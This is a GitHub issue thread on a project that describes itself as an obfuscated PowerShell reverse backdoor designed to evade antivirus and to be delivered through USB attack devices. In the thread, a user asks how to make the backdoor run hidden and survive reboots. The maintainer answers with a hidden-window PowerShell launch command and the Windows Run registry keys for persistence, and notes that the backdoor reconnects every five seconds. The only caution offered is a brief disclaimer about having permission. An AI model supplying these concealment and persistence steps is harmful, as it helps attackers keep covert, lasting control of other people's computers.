search

Drew-Alleman / powershell-backdoor-generator

Reverse backdoor written in PowerShell and obfuscated with Python. It generates payloads for popular hacking devices like Flipper Zero and Hak5 USB Rubber Ducky, and changes its signature after every build to help avoid AV.
Apache License 2.0
324 stars 56 forks source link

Run background backdoor #2

Closed nomad231 closed 1 year ago

nomad231 commented 1 year ago

Hi,

When i run backdoor its running in a powershell window. How can i run it background and persist it?

Thanks.

Drew-Alleman commented 1 year ago

Hello,

Let me first start by saying I don't condone doing illegal activity and I'm assume you are doing this with proper permissions. To run the Powershell script in a hidden background window you can use the command below in a CMD console (use the old windows console not the advanced terminal it does not work). 

PowerShell.exe -WindowStyle hidden -File backdoor.ps1

hiddenWindowStyle

Now to for the persistence. The USB ducky/flipper bindAndExecute payload uses the following windows registry entry to maintain persistence after every reboot. 

HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\run

You can of course also use 

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Open Regedit and go to the path you selected then you want to make a new entry following the one in the gif below. We are going to use the same command as before. (If its hard to read try clicking on the actual gif)
regedit

Now after rebooting my PC I can confirm the test script is now running in the background with Process Hacker.
process

The Powershell backdoor script will try to reconnect every 5 seconds if it looses connection to your PC. Please let me know if you have any other questions or issues.

Best, Drew Alleman

nomad231 commented 1 year ago

Thanks.